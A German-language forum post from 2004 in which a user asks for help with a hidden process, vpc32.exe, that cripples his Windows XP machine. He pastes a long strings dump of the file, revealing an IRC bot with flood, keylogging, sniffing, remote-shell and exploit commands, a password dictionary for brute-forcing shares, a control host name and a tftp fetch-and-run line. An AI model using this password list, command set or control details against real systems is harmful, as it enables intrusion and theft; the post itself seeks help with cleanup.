Hallo Leute,
ich breche hier echt über meine Tastatur zusammen *grrr*
Folgendes Problem habe ich seid 2 Tagen und finde zum verrecken keine
Lösung.
Plötzlich wird der Rechner langsam ... ich schaue mit dem
Task-Manager was los ist, DER geht aber garnicht auf sondern ist nur
im Sys-Trey zu sehen und DA bleibt er auch *grrr*
Also den Security-Task-Manager aufgemacht und den Prozess beendet ...
plötzlich sehe ich bei einer Datei mit dem Namen: vpc32.exe (die ich
nicht kenne) eine CPU Aktivität von 98% ... OK denke ich mir ... kein
Wunder das die Kiste einschläft ... alsooo ... Prozess beenden ... JA
DENKSTE, ******** VERDAMMTE ... plötzlich hagelt es im Speicher von
Einträgen aller svhost.exe und ich krieg sie nicht raus !? *heul*
Die Datei vpc32.exe ist unsichtbar (im Security-Task-Manager
sichtbar, wird da nur als unsichtbare Datei im System deklariert und
siehe da ... am angegebenen Ort "Windos -> System32" ist auch nix zu
finden, trotz anzeigen aller Dateien!aber aktiv und weder Norton
noch Ad-Watch und Ad-Aware finden was !!!???
Selbst wenn ich im Regeditor im angegebenen Pfad nachschau ... DA steht nix
Ein Eintrag aus den Ad-Watch Log:
------------------------------------------------------
#:38 [vpc32.exe]
FilePath : E:\WINDOWS\System32\
ProcessID : 3772
ThreadCreationTime : 24.09.2004 08:46:20
BasePriority : Normal
-------------------------------------------------------
Nebeneffekt des ganzen ... WinRAR als auch WINzip gehen nicht mehr
auf, hängen sich aber in den Speicher .... Verlauf im IE lässt sich
nicht mehr anklicken (IE schmiert ab) ... direkte Adresseingabe in
ein neugestarteten IE nicht möglich ... erst der Aufruf einer Adresse
aus den Favoriten und DANN die Eingabe der Adresse lassen den Zugriff
zu.
Und es wird nicht besser ... im Gegenteil ... alles was übers Kontex
aufgerufen wird ... hängt sich nur in den Speicher und wird nicht
ausgeführt.
Selbst im Abgesicherten Modus von XP-Prof ist nix zu machen.
Also um es gelinde zusagen ... mir Platzt der Arsch und ich dreh hier
echt am Rad *grrrrrrrrr*
Kann mir da einer helfen ??? BBB III TTT EEE
MfG ein dezent durchdrehender Mike
P.S: ich komme nicht mal dazu Hijack zu installieren, da es als zip runtergeladen wird und zip als auch rar gehen ja nicht mehr auf :wacko:
P.P.S: und wer möchte kann sich ja mal den lustigen Eintrag anschauen, den diese Datei (vpc32.exe) angeblich (laut Security-Task-Manager) als Text beinhaltet, ust allerdinsg ETWAS länger:
--------------------------------- ANFANG --------------------------
NOTICE s Your attempt has been logged.
Log list
Login List
The service could not be logged on. The account does not have the correct access rights.
Number of Logins d
Last Logon d
Last Logoff d
Logon Server S
----------------
This program cannot be run in DOS mode.
QQESVWxj Ye
runtime error
TLOSS error
DOMAIN error
abnormal program termination
Microsoft Visual C
Runtime Error
program name unknown
d, File s, Request s.
d, Directory s\.
socket open failed
Socket open.
Socket closed.
d, Scan thread d, Subthread d.
d, Scan thread d, Subthread d.
NOTICE s Authentication failed
TCP redirect
Syn flood
UDP flood
Ping flood
Find file
Process list
QUIT reconnecting
QUIT disconnecting
Remote shell
Clipboard Data
d, Username s.
d, Directory s\.
d, File s, Request s.
d, in channel s.
ICMP.dll not available
helo rndnickmail from
rcpt to
datasubject sfrom s
char authost
char versionlist
netmaniac was here
tftp i s get s
DCC SEND s i i i
S/no password
Server myBot
CacheControl nocache,nostore,maxage0
pragma nocache
AcceptRanges bytes
Date s s GMT
LastModified s s GMT
Expires s s GMT
Connection close
Server myBot
CacheControl nocache,nostore,maxage0
pragma nocache
AcceptRanges bytes
Date s s GMT
LastModified s s GMT
Expires s s GMT
Connection close
PRIVMSG s Searching for s
TITLEIndex of s/TITLE
H1Index of s/H1
CODELast Modified/CODE
Searching for s
CODEParent Directory/CODE
PRIVMSG s Found s Files and s Directories
Found i Files and i Directories
tftp i s get s
Mozilla/4.0 compatible
Kernel32.dll failed.
User32.dll failed.
Advapi32.dll failed.
Gdi32.dll failed.
Ws2_32.dll failed.
Wininet.dll failed.
Icmp.dll failed.
Netapi32.dll failed.
Dnsapi.dll failed.
Iphlpapi.dll failed.
Mpr32.dll failed.
Shell32.dll failed.
Odbc32.dll failed.
Avicap32.dll failed.
Windows for Workgroups 3.1a
Windows 200 5.0
Windows 200 5.0
WinXP Professional universal lsass.exe
Win2k Professional universal netrap.dll
Win2k Advanced Server SP4 netrap.dll
tftp i s get s
echo off
if exist
EXEC master..xp_cmdshell tftp i s GET s
EXEC master..xp_cmdshell
The specified database does not exist.
The handle does not have the required access right.
The specified service name is invalid.
The handle is invalid.
The service binary file could not be found.
An instance of the service is already running.
The database is locked.
The service depends on a service that does not exist or has been marked for deletion.
The service depends on another service that has failed to start.
The service has been disabled.
The specified service does not exist.
The service has been marked for deletion.
The process for the service was started, but it did not call StartServiceCtrlDispatcher.
The service cannot be stopped because other running services are dependent on it.
The requested control code is undefined.
The requested control code is not valid, or it is unacceptable to the service.
The requested control code cannot be sent to the service because the state of the service.
The service has not been started.
The system is shutting down.
An unknown error occurred
The following Windows services are registered
Share name Resource Uses Desc
Full Name S
User Comment S
Privilege Level s
Auth Flags d
Home Directory S
Password Age d
Bad Password Count d
Country Code d
Users Language d
Max. Storage d
Units Per Week d
Username accounts for local system
Total users found d.
Access denied.
Level parameter is invalid.
The name is invalid.
Invalid parameter.
Not enough memory.
This network request is not supported.
Server name not found.
Share not found.
Duplicate share name.
Invalid for redirected resource.
Device or directory does not exist.
The computer name is invalid.
The operation is allowed only on the primary domain controller of the domain.
The group already exists.
The user account already exists.
The password is shorter than required or does not meet the password policy requirement.
Network connection not found.
The user name could not be found.
An unknown error occurred.
no password
no password
001Your client version is outdated
001Error Executing File
s\My Shared Folder
now an IRC Operator
ServU FTP Server
d, Server thread d.
d, Server thread d.
d, Server thread d.
Bot by JuVeNiLe
Microsoft Update
mIRC v6.03 Khaled MardamBey
mIRC v6.10 Khaled MardamBey
mIRC v6.12 Khaled MardamBey
mIRC v6.14 Khaled MardamBey
wXP SP1 most others
w2k SP4 many
tftp i s get s
tftp.exe i get j
d, Server thread d.
raw PRIVMSG 1
couldnt resolve host
d.d, Build d. Sysdir
s. Current User
Not connected
s. IP Address
File Not Found
Thread List
xml version
gsearchrequest xmlnsg
Select DAVdisplayname from scope
ContentType text/xml
Windows XP SP01 GERNLITFR
Windows XP SP01 ENG
tftp i s get sstart swank
not recognized
raw PRIVMSG 1
----------------
GetProcAddress
LoadLibraryA
5mKdaypR\Rtwou
qpewOf
LokHyp
dPipNc
oWidhaB
PoiwS
lercmpLh
NKeb
Ixyo
.data
.rdata
.text
SetEndOfFile
FlushFileBuffers
SetStdHandle
GetStringTypeW
GetStringTypeA
RtlUnwind
GetFileType
GetStdHandle
SetHandleCount
GetEnvironmentStringsW
GetEnvironmentStrings
FreeEnvironmentStringsW
FreeEnvironmentStringsA
UnhandledExceptionFilter
LCMapStringW
LCMapStringA
VirtualAlloc
VirtualFree
HeapCreate
HeapDestroy
GetCPInfo
GetVersion
GetCommandLineA
GetStartupInfoA
HeapReAlloc
GlobalMemoryStatus
QueryPerformanceFrequency
QueryPerformanceCounter
GenerateConsoleCtrlEvent
TerminateThread
WaitForMultipleObjects
GetLogicalDrives
CreateMutexA
WaitForSingleObject
GetCurrentProcessId
GetVersionExA
GetLocaleInfoA
SetConsoleCtrlHandler
CreatePipe
DuplicateHandle
PeekNamedPipe
GetExitCodeProcess
GetCurrentProcess
TerminateProcess
CreateDirectoryA
WideCharToMultiByte
CopyFileA
GetComputerNameA
SetFileAttributesA
ExpandEnvironmentStringsA
GetFileTime
SetFileTime
CreateFileMappingA
MapViewOfFile
UnmapViewOfFile
GlobalLock
GlobalUnlock
LoadLibraryExA
FormatMessageA
GetModuleHandleA
GetFileAttributesA
GetDateFormatA
GetTimeFormatA
OpenProcess
GetSystemInfo
ReadProcessMemory
VirtualQueryEx
FileTimeToLocalFileTime
FileTimeToSystemTime
GetProcessHeap
HeapAlloc
HeapFree
LoadLibraryA
GetProcAddress
GetEnvironmentVariableW
FreeLibrary
FindFirstFileA
FindNextFileA
FindClose
TransactNamedPipe
MultiByteToWideChar
GetFileSize
SetFilePointer
ReadFile
ExitProcess
GetSystemDirectoryA
DeleteFileA
GetTempPathA
CreateProcessA
MoveFileA
CreateFileA
WriteFile
CloseHandle
GetLocalTime
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
GetTickCount
EnterCriticalSection
LeaveCriticalSection
ExitThread
lstrcmpiA
GetModuleFileNameA
CreateThread
Sleep
GetLastError
abcdefghijklmnopqrstuvwxyz
E\WINDOWS\System32\vpc32.exe
ownz
owning.ath.cx
Server running on Port 113.
Bot started.
wu_q/pw
Bot started.
Server running on Port 113.
NKeb
Exploiting IP s.
File transfer complete to IP s
NetAddAlternateComputerName
netapi32.dll
Exploiting IP s.
\\s\pipe\wkssvc
\\s\ipc
Exploiting IP s.
ContentLength d
Host s
/gsearchrequest
Failed to get requested URL from HTTP server.
URL visited.
Failed to connect to HTTP server.
Could not open a connection.
Invalid URL.
Exploiting IP s.
File transfer started to IP s
s No s thread found.
d threads stopped.
s s stopped.
File transfer complete to IP s
File transfer started to IP s
File not found s
Failed to open file s.
failed, returned
Error socket
octet
Done with s flood to IP s. Sent d packets dKB/sec
Error sending packets to IP s. Packets sent d. Returned
random
Invalid target IP.
failed, returned
Error setsockopt
failed, returned
Error socket
s. Hostname
Type
Dialup
s. Uptime
s. Hostname
Windows s
s total, s free. OS
sKB total, sKB free. Disk
I64uMHz. RAM
Send error
Done with flood
Exploiting IP s.
connected.
Failed to start server, error
Server running on Port 113.
Bot started.
Error Failed to connect to target, returned
, returned
Error Failed to open socket
Authentication failed. Remote userid s
Failed to start server on Port d.
Failed to start client thread, error
Client connection from IP s
Server started on s
3ytThru
yessAu
SessionReadShellThread exited, error
Failed to execute shell, error
Failed to execute shell.
Failed to create shell stdin pipe, error
Failed to create shell stdout pipe, error
WaitForMultipleObjects error
Failed to create ReadShell session thread, error
Failed to create ReadShell session thread, error
Netapi32.dll couldnt be loaded.
Network shares added.
s share.
Failed to add
s added.
Share
s share.
Failed to add
s added.
Share
Advapi32.dll couldnt be loaded.
Failed to restore SeNetworkLogonRights to accounts in local system policy.
Added SeNetworkLogonRights to d accounts in local system policy.
SeNetworkLogonRight
Failed to open enumeration of SAM accounts registry key.
Unrestricted anonymous enumeration of SAM accounts.
Failed to unrestrict anonymous enumeration of SAM accounts.
restrictanonymous
Failed to open IPC restriction registry key.
Unrestricted access to the IPC Share.
Failed to unrestrict access to the IPC Share.
restrictanonymous
Failed to open DCOM registry key.
DCOM enabled.
Enable DCOM failed.
Netapi32.dll couldnt be loaded.
Network shares deleted.
s share.
Failed to delete
s deleted.
Share
S share.
Failed to delete
S deleted.
Share
Advapi32.dll couldnt be loaded.
Failed to remove SeNetworkLogonRights from any accounts in local system policy.
Removed SeNetworkLogonRights from d accounts in local system policy.
SeNetworkLogonRight
Failed to open enumeration of SAM accounts registry key.
Restricted anonymous enumeration of SAM accounts.
Failed to restrict anonymous enumeration of SAM accounts.
restrictanonymoussam
Failed to open IPC Restriction registry key.
Restricted access to the IPC Share.
Failed to restrict access to the IPC Share.
restrictanonymous
Failed to open DCOM registry key.
DCOM disabled.
Disable DCOM failed.
Exploiting IP s.
sexit
x x xwXP SP1 many
staff
teacher
student
intranet
internet
main
winpass
blank
office
control
nokia
siemens
compaq
dell
cisco
oracle
orainstall
sqlpassoainstall
databasepassword
data
databasepass
dbpassword
dbpass
access
database
domainpassword
domainpass
domain
hello
hell
slut
bitch
fuck
exchange
backup
technical
loginpass
login
mary
katie
kate
george
eric
chris
neil
brian
peter
susan
luke
peter
john
mike
bill
fred
winnt
winxp
windows
oeminstall
oemuser
user
homeuser
home
accounting
accounts
internet
outlook
qwerty
null
root
server
system
default
changeme
linux
unix
demo
none
guest
test
pass
passwd
password
password1
admin
admins
administrat
administrateur
administrador
administrator
oracle
database
default
guest
wwwadmin
teacher
student
owner
computer
root
staff
admin
admins
administrat
administrateur
administrador
administrator
juvenile.com
SYSTEM\CurrentControlSet\Control\Lsa
Software\Microsoft\OLE
Software\Microsoft\Windows\CurrentVersion	 2;RunServices
Software\Microsoft\Windows\CurrentVersion	 2;Run
ownz
ownz
ownz
keys.txt
ownz
owning.ath.cx
ownitback
0123456789abcdefghijklmnopqrstuvwxyz
country
comp
letterz
letter
const
Error server failed, returned
Failed to start client thread, error
Client connection from IP s
Ready and waiting for incoming connections.
Failed to install controlC handler, error
Error WSAStartup
Login rejected, Remote user
Login rejected, Remote user
Protocol string too long.
User logged out
Error SessionRun
User logged in
Error getpeername
Failed to start IO thread, error
Remote Command Prompt
cmd.exe
Could not read data from proccess.
Proccess has terminated.
Could not read data from proccess
Failed to start connection thread, error
Client connection to IP s
Failed to start client thread, error
Client connection from IP s
d to s
Suspicious s packet from s
failed, returned
Error recv
failed, returned
Error WSAIoctl
failed, returned
Error bind
failed, returned
Error socket
Unknown
SetCookie
Paypal.com
PayPal.Com
paypal.com
Paypal
PayPal
paypal
password
Password
Pass
pass
login
Login
admin
Admin
Pass
User
Password
password
Login
login
admin
Admin
OpenSSL/0.9.6
password
Password
Pass
User
/Oper
/oper
//oper
Oper
secure
.secure
hashin
hashin
hashin
.hashin
auth
auth
auth
auth
auth
auth
\auth
/auth
auth
auth
auth
auth
auth
auth
auth
auth
auth
,auth
.auth
login
login
login
login
login
login
\login
/login
login
login
login
login
login
login
start.scan
scan.start
start.scan
scan.start
start.scan
scan.start
.start.scan
.scan.start
scan.startall
scan.startall
scan.startall
scan.startall
.scan.startall
scan.all
scan.all
scan.all
scan.all
.scan.all
secure
secure
secure
secure
.secure
advscan
advscan
advscan
advscan
.advscan
.asc
login
login
login
login
login
login
,login
.login
Joined channel s.
Failed to change nick for Master s.
Master s changed identity to .
User s logged out.
User s logged out.
Chat failed by unauthorized user s.
Chat already active with user s.
Failed to start chat thread, error
Chat from user s.
s failed from unauthorized user s.
Receive file
Failed to start transfer thread, error
s from user s.
Receive file
Process list failed.
Process list completed.
Listing processes
SeDebugPrivilege
SeDebugPrivilege
Finished sending packets to s.
Error sending pings to s.
Finished sending pings to s.
Error sending pings to s.
DownloadsLocation
SOFTWARE\iMesh\Client
Install_Dir
Exploiting IP s.
C\a.exe
022OPtestv1.2
022OPtestv1.1
Error getting ARP cache
Not supported by this system.
ARP cache is empty.
Unable to allocation ARP cache.
Error getting ARP cache
pass_pleazs
pass_pleaz
Exploiting IP s, Password
passed
pleaz_run_done
pleaz_runs
version
Exploiting IP s, Share \s, User
c\windows\system32c
Admin\system32c\winnt\system32
s Server S Message S
Message sent successfully.
A general failure occurred in the network hardware.
User list error s
An access violation has occured.
User info error
Workstations S
Parameters S
Unknown
Administrator
User
Guest
Comment S
Account S
s No username specified.
s Error with username
s username
Share list error s
s No share specified.
s Error with share
s share
Unknown
Paused
Pausing
Continuing
Running
Stoping
Starting
Stopped
A thread could not be created for the service.
s No service specified.
Error with service
s service
Continued
Continue
Paused
Pause
Stopped
Stop
Started
Start
Listed
List
Deleted
Delete
Added
Exploiting IP s.
d User
Exploiting IP
admin
root
comspec
1 goto repeat
repeat
sdel.bat
SeShutdownPrivilege
explorer.exe
s Error s
Exploiting IP s.
\\s\ipc
\lsarpc
fyfefef
WvWyRte
Failed to open LSA system policy.
Failed to enumerate LSA accounts.
Users
iCAdministrators
DLL test complete.
capGetDriverDescriptionA
capCreateCaptureWindowA
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
SHChangeNotify
ShellExecuteA
shell32.dll
WNetCancelConnection2W
WNetCancelConnection2A
WNetAddConnection2W
WNetAddConnection2A
DeleteIpNetEntry
GetIpNetTable
iphlpapi.dll
DnsFlushResolverCacheEntry_A
DnsFlushResolverCache
dnsapi.dll
NetMessageBufferSend
NetUserGetInfo
NetUserEnum
NetUserDel
NetUserAdd
NetRemoteTOD
NetApiBufferFree
NetScheduleJobAdd
NetShareEnum
NetShareDel
NetShareAdd
netapi32.dll
IcmpSendEcho
IcmpCloseHandle
IcmpCreateFile
icmp.dll
InternetCloseHandle
InternetGetLastResponseInfoA
InternetReadFile
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
InternetGetConnectedStateEx
InternetGetConnectedState
wininet.dll
closesocket
shutdown
getpeername
gethostbyaddr
gethostbyname
gethostname
getsockname
setsockopt
accept
listen
select
bind
recvfrom
recv
sendto
send
ntohl
ntohs
htonl
htons
inet_addr
inet_ntoa
connect
ioctlsocket
socket
WSACleanup
WSAGetLastError
__WSAFDIsSet
WSAAsyncSelect
WSAStartup
DeleteObject
DeleteDC
BitBlt
SelectObject
GetDIBColorTable
GetDeviceCaps
CreateCompatibleDC
CreateDIBSection
CreateDCA
StartServiceCtrlDispatcherA
SetServiceStatus
RegisterServiceCtrlHandlerA
LsaNtStatusToWinError
LsaClose
LsaFreeMemory
LsaRemoveAccountRights
LsaAddAccountRights
LsaLookupNames2
LsaEnumerateAccountsWithUserRight
LsaOpenPolicy
GetUserNameA
IsValidSecurityDescriptor
EnumServicesStatusA
CloseServiceHandle
DeleteService
CreateServiceA
ControlService
StartServiceA
OpenServiceA
OpenSCManagerA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegDeleteValueA
RegQueryValueExA
RegSetValueExA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetForegroundWindow
GetWindowTextA
GetKeyState
GetAsyncKeyState
ExitWindowsEx
CloseClipboard
GetClipboardData
OpenClipboard
DestroyWindow
IsWindow
FindWindowA
SendMessageA
RegisterServiceProcess
QueryPerformanceFrequency
QueryPerformanceCounter
SearchPathA
GetDriveTypeA
GetLogicalDriveStringsA
GetDiskFreeSpaceExA
Module32First
Process32Next
Process32First
CreateToolhelp32Snapshot
SetErrorMode
kernel32.dll
Exploiting IP s.
ADc\s.exe
s Return
s Buffer full
s Changed Windows s
Exploiting IP s.
Error server failed, returned
Client connection from IP s
Done with s flood to IP s. Sent d packets dKB/sec
Error sending packets to IP s. Packets sent d. Returned
Invalid target IP.
failed, returned
Error setsockopt
failed, returned
Error socket
s s HTTP/1.1Referer sHost sConnection close
i bytes
right
s bytes
right
CODESize/CODE
right
CODEName/CODE
Failed to start worker thread, error
Worker thread of server thread d.
ContentLength i
ContentType s
ContentType s
application/octetstream
text/html
Error server failed, returned
Error Failed to connect invalid hostname or user account.
Successful upload of s to s/s.
Successful download of s/s to s.
information is Domain \\S, User
The Windows logon Pid
information is Domain \\S, User
The Windows logon Pid
information is Domain \\S, User
The Windows logon Pid
Only supported on Windows NT/200.
Failed to enable Debug Privilege.
SeDebugPrivilege
Unable to find Winlogon Process ID.
Unable to find the password in memory.
information is Domain \\S, User
The Windows logon Pid
RtlRunDecodeUnicodeString
RtlDestroyQueryDebugBuffer
RtlQueryProcessDebugInformation
RtlCreateQueryDebugBuffer
NtQuerySystemInformation
SeDebugPrivilege
Found s\s
Files found d.
Searching for file s.
s total, s free, s available.A\
s Drive
Failed to stat, device not ready.
s Drive
failed
failed
failed
failed
Cdrom
Network
Disk
Invalid
Unknown
Bad URL or DNS Error s.
Update failed Error executing file s.
Opened s.
open
File download .1fKB to s .1fKB/sec.
CRC32 is incorrect. Local CRC32 d, Expected CRC32 d.
Filesize is incorrect. Recevied d bytes, Expected d bytes.
Couldnt open file for writing s.
Exploiting IP s.
File transfer started to IP s
\\s\pipe\epmapper
s bytes.
Transfer complete from IP s, Filename s
Socket error.
Error opening socket.
Error opening file for writing.
Error unable to write file to disk.
s bytes.
Transfer complete to IP s, Filename s
Socket error.
Socket error.
Unable to open socket.
Send timeout.
File doesnt exist.
Failed to open socket.
Failed to bind to socket.
Failed to create socket.
Failed to send to Remote command shell.
Failed to open remote command shell.
Failed to open socket.
Exploiting IP s.
Connected to s
netninjaz_place
neTmaNiac
wkernel32.dll
rwwunknown.dll
swwunknown.dll
wkernel32.dll
uwwunknown.dll
vwwunknown.dll
wwwunknown.dll
\Vwadvapi32.dll
wadvapi32.dll
duqcomctl32.dll
duqcomctl32.dll
duqcomctl32.dll
sQuws2_32.dll
buws2_32.dll
regkey3
regkey2
regkey1
versionlistd
authostd
psniffchan
keylogchan
exploitchan
chanmode
modeonconn
nickconst
valuename
keylogfile
filename
chanpass2
channel2
server2
chanpass
channel
serverpass
server
password
version
botid
char s
Connected to s.
Failed to start ftp transfer thread, error
Ftp upload of s to s/s.
Ftp download of s/s to s.
ftpget
ftpput
ftpget
hcon
httpcon
Message sent to s.
Invalid flood type specified.
Invalid flood time must be greater than 0.
Failed to start flood thread, error
s for s seconds.
s s flooding
Normal
Spoofed
random
tcpflood
Failed to start flood thread, error
Sending d pings to s. packet size d, timeout dms.
ping
pingflood
Failed to start flood thread, error
Sending d packets to s. Packet size d, Delay dms.
udpu
udpflood
Failed to start scan, port is invalid.
Failed to start scan thread, error
d with a delay of d seconds for d minutes using d threads.
s Port Scan started on s
Sequential
Random
Failed to start scan, no IP specified.
Already d scanning threads. Too many specified.
advscan
c_action
c_privmsg
Failed to start redirection thread, error
d to s
TCP redirect created from s
redirect
Failed to start transfer thread, error
Downloading URL s to s.
download
Failed to start flood thread, error
s for s seconds.
Flooding
synflood
Failed to start clone thread, error
Created on s
clone
Invalid flood time must be greater than 0.
Failed to start flood thread, error
s for s seconds.
Flooding
icmp
icmpflood
Rename
rename
Failed to start search thread, error
Searching for file s in s.
findfile
Commands s
Couldnt execute file.
executee
Bot ID must be different than current running process.
Failed to start download thread, error
Downloading update from s.
ss.exe
update
Delay.
delay
Repeat not allowed in command line s
Repeat s
repeat
repeat
c_part
c_join
c_nick
c_mode
Mode change s
mode
Cycle.
cycle
Action s s.
action
Privmsg s s.
privmsg
Alias added s.
addalias
Unrecognized command s.
Failed to shutdown system.
Shutting down system.
shutdown
Failed to reboot system.
Rebooting system.
reboot
Failed to logoff current user.
Logging off current user.
logoff
system
Gethost s.
Unable to extract Gethost command.
Gethost s, Command s
gethost
Invalid parameters for amateur video capture.
Error while capturing amateur video from webcam.
Amateur video saved to s.
video
Invalid parameters for webcam capture.
Error while capturing from webcam.
Webcam capture saved to s.
frame
Driver list complete.
Driver
drivers
No filename specified for screen capture.
Error while capturing screen.
Screen capture saved to s.
screen
capture
Failed to load advapi32.dll or netapi32.dll.
Command unknown.
No message specified.
send
User list failed.
User list completed.
user
Share list failed.
Share list completed.
share
delete
continue
pause
stop
Service list failed.
Service list completed.
start
No key logger thread found.
d threads stopped.
Key logger stopped.
Failed to start logging thread, error
Key logger active.
file
Already running.
file
keylog
No thread found.
d threads stopped.
Server stopped.
Failed to start server, error
Server running on IP s113.
Already running.
ident
No Carnivore thread found.
d threads stopped.
Carnivore stopped.
Failed to start sniffer thread, error
Carnivore packet sniffer active.
Already running.
psniff
Read file failed s
Read file complete s
readfile
Commands s
Error sending to remote shell.
Command sent.
Client not open.
mirc
mirccmd
Failed to start connection thread, error
visit
List s
list
Failed to start transfer thread, error
Send File s, User s.
Deleted
delete
Failed to terminate process ID s
Process killed ID s
kill
Failed to terminate process s
Process killed s
killproc
Couldnt resolve hostname.
Lookup s
Lookup s
Server changed to
server
Couldnt open file s
File opened s
open
open
Prefix changed to
prefix
Random nick change of clone d to s.
c_rndnick
Failed to kill thread s.
Killed thread s.
c_quit
Failed to kill thread s.
Killed thread s.
No active threads found.
Stopped d threads.
killthread
Sent IRC Raw s.
rawr
Parted channel
part
Joined channel s.
join
Nick changed to
nick
Failed to start search thread, error
Searching for password.
findpass
crash
Crashing bot.
crash
Failed to start server thread, error
Server started on IP s
Already running.
tftpserver
Failed to start server thread, error
Server listening on IP s
httpserver
Failed to start server thread, error
Server listening on IP s
rlogin
rloginserver
currentip
Failed to load dnsapi.dll.
Failed to flush DNS cache.
DNS cache flushed.
flushdns
Failed to flush ARP cache.
ARP cache flushed.
farp
flusharp
Get Clipboard.
getclip
Login list complete.
cmdstop
Remote shell ready.
Couldnt open remote shell.
Remote shell already running.
ocmd
opencmd
encrypt
testdlls
driveinfo
Uptime s.
uptime
Search completed.
getcdkeys
Failed to start listing thread, error
Proccess list.
full
Already running.
procs
Removing Bot.
remove
System Info.
sysinfo
Network Info.
netinfo
clearlog
Failed to start listing thread, error
Listing log.
Alias list.
aliases
Failed to start list thread, error
List threads.
threadst
Status Ready. Bot Uptime s.
status
quit
Disconnecting.
disconnect
Reconnecting.
reconnect
stats
scanstats
Scan
scanstop
Secure
securestop
Clone
clonestop
psstop
procsstop
ffstop
findfilestop
pingstop
udpstop
synstop
redirectstop
logstop
Connection
ftptstop
Server
httpstop
Server
tftpstop
Server
rloginstop
Server
socks4stop
Failed to start server thread, error
Server started on s
socks4
Failed to start secure thread, error
s system.
Unsecuring
Securing
secure
unsec
unsecure
secure
version
User s logged out.
Invalid login slot number d.
No user logged in at slot d.
User s logged out.
logout
died
Random nick change to s.
rndnick
server
rndnick
chan
user
Failed to login user s, too many logins already.
User s logged in.
Password accepted.
Failed authentication by
login
Location
Location
InstallPath
Chrome
SerialNumber
Serial
Serial
Serial
Serial
ergc
ProductId
Software\Microsoft\Windows\CurrentVersion
CustomerNumber
RegNumber
Window
Window
Exploiting IP s.
beagle1
List complete.
Begin
Cleared.
Cleared.
Logs
d after d minutes of scanning.
Finished at s
Failed to start worker thread, error
Failed to initialize critical section.
IP s, Port d is open.
Apache/2
Apache/2
Apache/1
Apache/1
MicrosoftIIS/4.0
MicrosoftIIS/5.0
MicrosoftIIS/5.5
MicrosoftIIS/6.0
Server
Server
Server
socket failed
recvfrom
socket failed. sent d
sendto
Failed to start server, error
Server listening on IP s
Failed to start server, error
Server started on IP s
Scan not active.
Current IP s.
Total d in s.
Exploit Statistics
Kuang2
kuang2
DameWare
DameWare
NetDevil
netdevil
upnp
Optix
optix
MyDoom
mydoom
Beagle2
beagle2
Beagle1
beagle1
iis5ssl
WKSSVC_Other
lsass
lsass
Sasser
sasser
ntpass
NetBios
netbios
WebDav
webdav
MessageBoxA
GetActiveWindow
GetLastActivePopup
Program
Runtime Library
floating point not loaded
not enough space for arguments
not enough space for environment
not enough space for thread data
unexpected multithread lock error
unexpected heap error
unable to open console device
not enough space for _onexit/atexit table
pure virtual function call
not enough space for stdio initialization
not enough space for lowio initialization
unable to initialize heap
GAIsProcessorFeaturePresent
null
null
Qkkbal
wzrwhiwQwW
YufE
YuYh
YuWu
tItIuPj
tHtHuSj
PujVj
JudL
JucL
udjh
EjhiC
uqf0Cf
ugjjh
YYah
ChuC
PhduC
PhuC
PuhtCh
tjjheC
uhhRCh
uhpOCh
dujh
unjj
Et\u
Et\u
uhx7Ch
uhl7Ch
uhd7Ch
Cujj
PhaAjj
jXop
YPujjh
Rich
--------------------------------- Ende ------------------------
P.P.P.S: Rechtschreibfehler sind gewollt und dienen der allgemeinen
Belustigung und wer sie findet der darf sie behalten *ggg*
Noch aktuell?
